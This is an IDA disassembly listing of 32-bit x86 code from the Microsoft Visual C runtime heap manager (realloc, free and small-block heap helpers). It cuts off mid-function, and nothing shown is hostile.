; [00000077 BYTES: COLLAPSED CHUNK OF FUNCTION __heap_alloc_base. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4243C7 proc near ; CODE XREF: __heap_alloc_base+E0�p
; DATA XREF: .rdata:0043E054�o
push 9
call __unlock
add esp, 4
retn
sub_4243C7 endp
; ---------------------------------------------------------------------------
; [0000005B BYTES: COLLAPSED CHUNK OF FUNCTION __heap_alloc_base. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000A BYTES: COLLAPSED FUNCTION unknown_libname_5. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424440 proc near ; CODE XREF: _realloc_help+2D4�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004244EC SIZE 000000EE BYTES
; FUNCTION CHUNK AT 004245E5 SIZE 00000068 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E058
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0FFFFFFE0h
jbe short loc_424470
xor eax, eax
jmp loc_42463C
; ---------------------------------------------------------------------------
loc_424470: ; CODE XREF: sub_424440+27�j
cmp dword_4F4E6C, 3
jnz loc_424528
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4244D3
mov [ebp+var_1C], 0
mov ecx, [ebp+arg_4]
cmp ecx, dword_4F4E8C
ja short loc_4244D3
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_20]
push ecx
call ___sbh_resize_block
add esp, 0Ch
test eax, eax
jz short loc_4244D3
mov edx, [ebp+arg_0]
mov [ebp+var_1C], edx
loc_4244D3: ; CODE XREF: sub_424440+61�j
; sub_424440+73�j ...
mov [ebp+var_4], 0FFFFFFFFh
call sub_4244E1
jmp short loc_4244EC
sub_424440 endp
; =============== S U B R O U T I N E =======================================
sub_4244E1 proc near ; CODE XREF: sub_424440+9A�p
; DATA XREF: .rdata:0043E060�o
push 9
call __unlock
add esp, 4
retn
sub_4244E1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424440
loc_4244EC: ; CODE XREF: sub_424440+9F�j
cmp [ebp+var_20], 0
jnz short loc_424523
cmp [ebp+arg_4], 0
jnz short loc_4244FF
mov [ebp+arg_4], 1
loc_4244FF: ; CODE XREF: sub_424440+B6�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 10h
mov eax, dword_4F4E68
push eax
call ds:dword_4F64E0 ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_424523: ; CODE XREF: sub_424440+B0�j
jmp loc_424639
; ---------------------------------------------------------------------------
loc_424528: ; CODE XREF: sub_424440+37�j
cmp dword_4F4E6C, 2
jnz loc_424606
cmp [ebp+arg_4], 0
jnz short loc_424542
mov [ebp+arg_4], 1
loc_424542: ; CODE XREF: sub_424440+F9�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
push 9
call __lock
add esp, 4
mov [ebp+var_4], 1
lea edx, [ebp+var_24]
push edx
lea eax, [ebp+var_2C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4245CC
mov [ebp+var_1C], 0
mov edx, [ebp+arg_4]
cmp edx, dword_454DFC
ja short loc_4245B3
mov eax, [ebp+arg_4]
shr eax, 4
push eax
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_2C]
push eax
call ___sbh_resize_block_0
add esp, 10h
test eax, eax
jz short loc_4245B3
mov ecx, [ebp+arg_0]
mov [ebp+var_1C], ecx
loc_4245B3: ; CODE XREF: sub_424440+14C�j
; sub_424440+16B�j
push 0FFFFFFFFh
mov edx, [ebp+var_1C]
mov [ebp+var_30], edx
lea eax, [ebp+var_10]
push eax
call __local_unwind2
add esp, 8
mov eax, [ebp+var_30]
jmp short loc_42463C
; ---------------------------------------------------------------------------
loc_4245CC: ; CODE XREF: sub_424440+13A�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_4245DA
jmp short loc_4245E5
; END OF FUNCTION CHUNK FOR sub_424440
; =============== S U B R O U T I N E =======================================
sub_4245DA proc near ; CODE XREF: sub_424440+193�p
; DATA XREF: .rdata:0043E06C�o
push 9
call __unlock
add esp, 4
retn
sub_4245DA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424440
loc_4245E5: ; CODE XREF: sub_424440+198�j
cmp [ebp+var_28], 0
jnz short loc_424604
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 10h
mov eax, dword_4F4E68
push eax
call ds:dword_4F64E0 ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_424604: ; CODE XREF: sub_424440+1A9�j
jmp short loc_424639
; ---------------------------------------------------------------------------
loc_424606: ; CODE XREF: sub_424440+EF�j
cmp [ebp+arg_4], 0
jnz short loc_424613
mov [ebp+arg_4], 1
loc_424613: ; CODE XREF: sub_424440+1CA�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
push 10h
mov ecx, dword_4F4E68
push ecx
call ds:dword_4F64E0 ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_424639: ; CODE XREF: sub_424440:loc_424523�j
; sub_424440:loc_424604�j
mov eax, [ebp+var_1C]
loc_42463C: ; CODE XREF: sub_424440+2B�j
; sub_424440+18A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424440
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_424650(void *Src,int)
sub_424650 proc near ; CODE XREF: _realloc_help+2AF�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
Size = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Dst = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00424823 SIZE 0000020C BYTES
; FUNCTION CHUNK AT 00424A3A SIZE 000000A9 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E070
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFC8h
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
cmp [ebp+Src], 0
jnz short loc_424690
mov ecx, [ebp+arg_4]
push ecx
call __malloc_base
add esp, 4
jmp loc_424AD2
; ---------------------------------------------------------------------------
loc_424690: ; CODE XREF: sub_424650+2D�j
cmp [ebp+arg_4], 0
jnz short loc_4246A9
mov edx, [ebp+Src]
push edx
call sub_424AF0
add esp, 4
xor eax, eax
jmp loc_424AD2
; ---------------------------------------------------------------------------
loc_4246A9: ; CODE XREF: sub_424650+44�j
cmp dword_4F4E6C, 3
jnz loc_42488F
loc_4246B6: ; CODE XREF: sub_424650:loc_42488A�j
mov [ebp+Dst], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja loc_42485C
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+Src]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_42480A
mov ecx, [ebp+arg_4]
cmp ecx, dword_4F4E8C
ja loc_42478A
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+Src]
push eax
mov ecx, [ebp+var_28]
push ecx
call ___sbh_resize_block
add esp, 0Ch
test eax, eax
jz short loc_424720
mov edx, [ebp+Src]
mov [ebp+Dst], edx
jmp short loc_42478A
; ---------------------------------------------------------------------------
loc_424720: ; CODE XREF: sub_424650+C6�j
mov eax, [ebp+arg_4]
push eax
call ___sbh_alloc_block
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_42478A
mov ecx, [ebp+Src]
mov edx, [ecx-4]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp eax, [ebp+arg_4]
jnb short loc_424751
mov ecx, [ebp+var_20]
mov [ebp+Size], ecx
jmp short loc_424757
; ---------------------------------------------------------------------------
loc_424751: ; CODE XREF: sub_424650+F7�j
mov edx, [ebp+arg_4]
mov [ebp+Size], edx
loc_424757: ; CODE XREF: sub_424650+FF�j
mov eax, [ebp+Size]
push eax ; Size
mov ecx, [ebp+Src]
push ecx ; Src
mov edx, [ebp+Dst]
push edx ; Dst
call _memcpy
add esp, 0Ch
mov eax, [ebp+Src]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_28], eax
mov ecx, [ebp+Src]
push ecx
mov edx, [ebp+var_28]
push edx
call sub_424FD0
add esp, 8
loc_42478A: ; CODE XREF: sub_424650+AA�j
; sub_424650+CE�j ...
cmp [ebp+Dst], 0
jnz short loc_42480A
cmp [ebp+arg_4], 0
jnz short loc_42479D
mov [ebp+arg_4], 1
loc_42479D: ; CODE XREF: sub_424650+144�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
push 0
mov edx, dword_4F4E68
push edx
call ds:dword_4F644C ; RtlAllocateHeap
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_42480A
mov eax, [ebp+Src]
mov ecx, [eax-4]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
cmp edx, [ebp+arg_4]
jnb short loc_4247E0
mov eax, [ebp+var_20]
mov [ebp+var_40], eax
jmp short loc_4247E6
; ---------------------------------------------------------------------------
loc_4247E0: ; CODE XREF: sub_424650+186�j
mov ecx, [ebp+arg_4]
mov [ebp+var_40], ecx
loc_4247E6: ; CODE XREF: sub_424650+18E�j
mov edx, [ebp+var_40]
push edx ; Size
mov eax, [ebp+Src]
push eax ; Src
mov ecx, [ebp+Dst]
push ecx ; Dst
call _memcpy
add esp, 0Ch
mov edx, [ebp+Src]
push edx
mov eax, [ebp+var_28]
push eax
call sub_424FD0
add esp, 8
loc_42480A: ; CODE XREF: sub_424650+9B�j
; sub_424650+13E�j ...
mov [ebp+var_4], 0FFFFFFFFh
call sub_424818
jmp short loc_424823
sub_424650 endp
; =============== S U B R O U T I N E =======================================
sub_424818 proc near ; CODE XREF: sub_424650+1C1�p
; DATA XREF: .rdata:0043E078�o
push 9
call __unlock
add esp, 4
retn
sub_424818 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424650
loc_424823: ; CODE XREF: sub_424650+1C6�j
cmp [ebp+var_28], 0
jnz short loc_42485C
cmp [ebp+arg_4], 0
jnz short loc_424836
mov [ebp+arg_4], 1
loc_424836: ; CODE XREF: sub_424650+1DD�j
mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+Src]
push eax
push 0
mov ecx, dword_4F4E68
push ecx
call ds:dword_4F64E0 ; RtlReAllocateHeap
mov [ebp+Dst], eax
loc_42485C: ; CODE XREF: sub_424650+71�j
; sub_424650+1D7�j
cmp [ebp+Dst], 0
jnz short loc_42486B
cmp dword_4F47F4, 0
jnz short loc_424873
loc_42486B: ; CODE XREF: sub_424650+210�j
mov eax, [ebp+Dst]
jmp loc_424AD2
; ---------------------------------------------------------------------------
loc_424873: ; CODE XREF: sub_424650+219�j
mov edx, [ebp+arg_4]
push edx
call __callnewh
add esp, 4
test eax, eax
jnz short loc_42488A
xor eax, eax
jmp loc_424AD2
; ---------------------------------------------------------------------------
loc_42488A: ; CODE XREF: sub_424650+231�j
jmp loc_4246B6
; ---------------------------------------------------------------------------
loc_42488F: ; CODE XREF: sub_424650+60�j
cmp dword_4F4E6C, 2
jnz loc_424A6A
cmp [ebp+arg_4], 0FFFFFFE0h
ja short loc_4248BC
cmp [ebp+arg_4], 0
jbe short loc_4248B5
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
jmp short loc_4248BC
; ---------------------------------------------------------------------------
loc_4248B5: ; CODE XREF: sub_424650+256�j
mov [ebp+arg_4], 10h
loc_4248BC: ; CODE XREF: sub_424650+250�j
; sub_424650+263�j ...
mov [ebp+Dst], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja loc_424A3A
push 9
call __lock
add esp, 4
mov [ebp+var_4], 1
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+Src]
push eax
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz loc_424A07
mov ecx, [ebp+arg_4]
cmp ecx, dword_454DFC
jnb loc_424998
mov edx, [ebp+arg_4]
shr edx, 4
push edx
mov eax, [ebp+var_30]
push eax
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_38]
push edx
call ___sbh_resize_block_0
add esp, 10h
test eax, eax
jz short loc_424935
mov eax, [ebp+Src]
mov [ebp+Dst], eax
jmp short loc_424998
; ---------------------------------------------------------------------------
loc_424935: ; CODE XREF: sub_424650+2DB�j
mov ecx, [ebp+arg_4]
shr ecx, 4
push ecx
call ___sbh_alloc_block_0
add esp, 4
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_424998
mov edx, [ebp+var_30]
xor eax, eax
mov al, [edx]
shl eax, 4
mov [ebp+var_34], eax
mov ecx, [ebp+var_34]
cmp ecx, [ebp+arg_4]
jnb short loc_42496A
mov edx, [ebp+var_34]
mov [ebp+var_44], edx
jmp short loc_424970
; ---------------------------------------------------------------------------
loc_42496A: ; CODE XREF: sub_424650+310�j
mov eax, [ebp+arg_4]
mov [ebp+var_44], eax
loc_424970: ; CODE XREF: sub_424650+318�j
mov ecx, [ebp+var_44]
push ecx ; Size
mov edx, [ebp+Src]
push edx ; Src
mov eax, [ebp+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_38]
push eax
call ___sbh_free_block
add esp, 0Ch
loc_424998: ; CODE XREF: sub_424650+2B8�j
; sub_424650+2E3�j ...
cmp [ebp+Dst], 0
jnz short loc_424A05
mov ecx, [ebp+arg_4]
push ecx
push 0
mov edx, dword_4F4E68
push edx
call ds:dword_4F644C ; RtlAllocateHeap
mov [ebp+Dst], eax
cmp [ebp+Dst], 0
jz short loc_424A05
mov eax, [ebp+var_30]
xor ecx, ecx
mov cl, [eax]
shl ecx, 4
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
cmp edx, [ebp+arg_4]
jnb short loc_4249D7
mov eax, [ebp+var_34]
mov [ebp+var_48], eax
jmp short loc_4249DD
; ---------------------------------------------------------------------------
loc_4249D7: ; CODE XREF: sub_424650+37D�j
mov ecx, [ebp+arg_4]
mov [ebp+var_48], ecx
loc_4249DD: ; CODE XREF: sub_424650+385�j
mov edx, [ebp+var_48]
push edx ; Size
mov eax, [ebp+Src]
push eax ; Src
mov ecx, [ebp+Dst]
push ecx ; Dst
call _memcpy
add esp, 0Ch
mov edx, [ebp+var_30]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_38]
push ecx
call ___sbh_free_block
add esp, 0Ch
loc_424A05: ; CODE XREF: sub_424650+34C�j
; sub_424650+368�j
jmp short loc_424A21
; ---------------------------------------------------------------------------
loc_424A07: ; CODE XREF: sub_424650+2A9�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+Src]
push eax
push 0
mov ecx, dword_4F4E68
push ecx
call ds:dword_4F64E0 ; RtlReAllocateHeap
mov [ebp+Dst], eax
loc_424A21: ; CODE XREF: sub_424650:loc_424A05�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_424A2F
jmp short loc_424A3A
; END OF FUNCTION CHUNK FOR sub_424650
; =============== S U B R O U T I N E =======================================
sub_424A2F proc near ; CODE XREF: sub_424650+3D8�p
; DATA XREF: .rdata:0043E084�o
push 9
call __unlock
add esp, 4
retn
sub_424A2F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424650
loc_424A3A: ; CODE XREF: sub_424650+277�j
; sub_424650+3DD�j
cmp [ebp+Dst], 0
jnz short loc_424A49
cmp dword_4F47F4, 0
jnz short loc_424A51
loc_424A49: ; CODE XREF: sub_424650+3EE�j
mov eax, [ebp+Dst]
jmp loc_424AD2
; ---------------------------------------------------------------------------
loc_424A51: ; CODE XREF: sub_424650+3F7�j
mov edx, [ebp+arg_4]
push edx
call __callnewh
add esp, 4
test eax, eax
jnz short loc_424A65
xor eax, eax
jmp short loc_424AD2
; ---------------------------------------------------------------------------
loc_424A65: ; CODE XREF: sub_424650+40F�j
jmp loc_4248BC
; ---------------------------------------------------------------------------
loc_424A6A: ; CODE XREF: sub_424650+246�j
; sub_424650:loc_424AD0�j
mov [ebp+Dst], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja short loc_424AA8
cmp [ebp+arg_4], 0
jnz short loc_424A84
mov [ebp+arg_4], 1
loc_424A84: ; CODE XREF: sub_424650+42B�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+Src]
push edx
push 0
mov eax, dword_4F4E68
push eax
call ds:dword_4F64E0 ; RtlReAllocateHeap
mov [ebp+Dst], eax
loc_424AA8: ; CODE XREF: sub_424650+425�j
cmp [ebp+Dst], 0
jnz short loc_424AB7
cmp dword_4F47F4, 0
jnz short loc_424ABC
loc_424AB7: ; CODE XREF: sub_424650+45C�j
mov eax, [ebp+Dst]
jmp short loc_424AD2
; ---------------------------------------------------------------------------
loc_424ABC: ; CODE XREF: sub_424650+465�j
mov ecx, [ebp+arg_4]
push ecx
call __callnewh
add esp, 4
test eax, eax
jnz short loc_424AD0
xor eax, eax
jmp short loc_424AD2
; ---------------------------------------------------------------------------
loc_424AD0: ; CODE XREF: sub_424650+47A�j
jmp short loc_424A6A
; ---------------------------------------------------------------------------
loc_424AD2: ; CODE XREF: sub_424650+3B�j
; sub_424650+54�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424650
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424AF0 proc near ; CODE XREF: sub_41D8A0+26E�p
; sub_41D8A0+3B2�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00424B76 SIZE 00000077 BYTES
; FUNCTION CHUNK AT 00424BF8 SIZE 0000003E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E088
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_424B1E
jmp loc_424C25
; ---------------------------------------------------------------------------
loc_424B1E: ; CODE XREF: sub_424AF0+27�j
cmp dword_4F4E6C, 3
jnz short loc_424B94
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
push eax
call ___sbh_find_block
add esp, 4
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_424B5D
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1C]
push edx
call sub_424FD0
add esp, 8
loc_424B5D: ; CODE XREF: sub_424AF0+5B�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_424B6B
jmp short loc_424B76
sub_424AF0 endp
; =============== S U B R O U T I N E =======================================
sub_424B6B proc near ; CODE XREF: sub_424AF0+74�p
; DATA XREF: .rdata:0043E090�o
push 9
call __unlock
add esp, 4
retn
sub_424B6B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AF0
loc_424B76: ; CODE XREF: sub_424AF0+79�j
cmp [ebp+var_1C], 0
jnz short loc_424B8F
mov eax, [ebp+arg_0]
push eax
push 0
mov ecx, dword_4F4E68
push ecx
call ds:dword_4F6448 ; RtlFreeHeap
loc_424B8F: ; CODE XREF: sub_424AF0+8A�j
jmp loc_424C25
; ---------------------------------------------------------------------------
loc_424B94: ; CODE XREF: sub_424AF0+35�j
cmp dword_4F4E6C, 2
jnz short loc_424C12
push 9
call __lock
add esp, 4
mov [ebp+var_4], 1
lea edx, [ebp+var_20]
push edx
lea eax, [ebp+var_28]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_424BDF
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+var_28]
push ecx
call ___sbh_free_block
add esp, 0Ch
loc_424BDF: ; CODE XREF: sub_424AF0+D9�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_424BED
jmp short loc_424BF8
; END OF FUNCTION CHUNK FOR sub_424AF0
; =============== S U B R O U T I N E =======================================
sub_424BED proc near ; CODE XREF: sub_424AF0+F6�p
; DATA XREF: .rdata:0043E09C�o
push 9
call __unlock
add esp, 4
retn
sub_424BED endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AF0
loc_424BF8: ; CODE XREF: sub_424AF0+FB�j
cmp [ebp+var_24], 0
jnz short loc_424C10
mov edx, [ebp+arg_0]
push edx
push 0
mov eax, dword_4F4E68
push eax
call ds:dword_4F6448 ; RtlFreeHeap
loc_424C10: ; CODE XREF: sub_424AF0+10C�j
jmp short loc_424C25
; ---------------------------------------------------------------------------
loc_424C12: ; CODE XREF: sub_424AF0+AB�j
mov ecx, [ebp+arg_0]
push ecx
push 0
mov edx, dword_4F4E68
push edx
call ds:dword_4F6448 ; RtlFreeHeap
loc_424C25: ; CODE XREF: sub_424AF0+29�j
; sub_424AF0:loc_424B8F�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424AF0
; ---------------------------------------------------------------------------
align 10h
; [00000062 BYTES: COLLAPSED FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_424CA2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000003A BYTES: COLLAPSED CHUNK OF FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424CE7 proc near ; CODE XREF: unknown_libname_6+A0�p
; DATA XREF: .rdata:0043E0B4�o
push 9
call __unlock
add esp, 4
retn
sub_424CE7 endp
; ---------------------------------------------------------------------------
; [00000052 BYTES: COLLAPSED CHUNK OF FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
call unknown_libname_6 ; Microsoft VisualC 2-8/net runtime
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp dword_4F4E6C, 3
jnz short loc_424D73
mov eax, dword_4F4E8C
jmp short loc_424D85
; ---------------------------------------------------------------------------
loc_424D73: ; CODE XREF: .text:00424D6A�j
cmp dword_4F4E6C, 2
jnz short loc_424D83
mov eax, dword_454DFC
jmp short loc_424D85
; ---------------------------------------------------------------------------
loc_424D83: ; CODE XREF: .text:00424D7A�j
xor eax, eax
loc_424D85: ; CODE XREF: .text:00424D71�j
; .text:00424D81�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_4F4E6C, 3
jnz short loc_424DBF
cmp dword ptr [ebp+8], 3F8h
ja short loc_424DB8
mov eax, [ebp+8]
mov dword_4F4E8C, eax
mov eax, 1
jmp loc_424E96
; ---------------------------------------------------------------------------
loc_424DB8: ; CODE XREF: .text:00424DA4�j
xor eax, eax
jmp loc_424E96
; ---------------------------------------------------------------------------
loc_424DBF: ; CODE XREF: .text:00424D9B�j
cmp dword_4F4E6C, 2
jnz short loc_424DF7
mov ecx, [ebp+8]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+8], ecx
cmp dword ptr [ebp+8], 780h
ja short loc_424DF0
mov edx, [ebp+8]
mov dword_454DFC, edx
mov eax, 1
jmp loc_424E96
; ---------------------------------------------------------------------------
loc_424DF0: ; CODE XREF: .text:00424DDB�j
xor eax, eax
jmp loc_424E96
; ---------------------------------------------------------------------------
loc_424DF7: ; CODE XREF: .text:00424DC6�j
cmp dword_4F4E6C, 1
jnz loc_424E94
cmp dword ptr [ebp+8], 0
jbe loc_424E94
lea eax, [ebp-4]
push eax
call sub_427A50
add esp, 4
mov ecx, [ebp-4]
and ecx, 0FFh
cmp ecx, 6
jl short loc_424E5C
cmp dword ptr [ebp+8], 3F8h
ja short loc_424E5A
mov edx, [ebp+8]
push edx
call ___sbh_heap_init
add esp, 4
test eax, eax
jz short loc_424E5A
mov eax, [ebp+8]
mov dword_4F4E8C, eax
mov dword_4F4E6C, 3
mov eax, 1
jmp short loc_424E96
; ---------------------------------------------------------------------------
loc_424E5A: ; CODE XREF: .text:00424E2F�j
; .text:00424E3F�j
jmp short loc_424E94
; ---------------------------------------------------------------------------
loc_424E5C: ; CODE XREF: .text:00424E26�j
mov ecx, [ebp+8]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+8], ecx
cmp dword ptr [ebp+8], 780h
ja short loc_424E94
call ___sbh_new_region
test eax, eax
jz short loc_424E94
mov edx, [ebp+8]
mov dword_454DFC, edx
mov dword_4F4E6C, 2
mov eax, 1
jmp short loc_424E96
; ---------------------------------------------------------------------------
loc_424E94: ; CODE XREF: .text:00424DFE�j
; .text:00424E08�j ...
xor eax, eax
loc_424E96: ; CODE XREF: .text:00424DB3�j
; .text:00424DBA�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000062 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000055 BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION ___sbh_verify_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424FD0 proc near ; CODE XREF: sub_424650+132�p
; sub_424650+1B2�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
mov [ebp+var_3C], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
sub eax, [edx+0Ch]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shr ecx, 0Fh
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
imul edx, 204h
mov eax, [ebp+var_3C]
lea ecx, [eax+edx+144h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
sub edx, 4
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
mov ecx, [eax]
sub ecx, 1
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
and edx, 1
test edx, edx
jz short loc_42502D
jmp loc_4255A8
; ---------------------------------------------------------------------------
loc_42502D: ; CODE XREF: sub_424FD0+56�j
mov eax, [ebp+var_1C]
add eax, [ebp+var_30]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_14], edx
mov eax, [ebp+var_1C]
mov ecx, [eax-4]
mov [ebp+var_C], ecx
mov edx, [ebp+var_14]
and edx, 1
test edx, edx
jnz loc_425177
mov eax, [ebp+var_14]
sar eax, 4
sub eax, 1
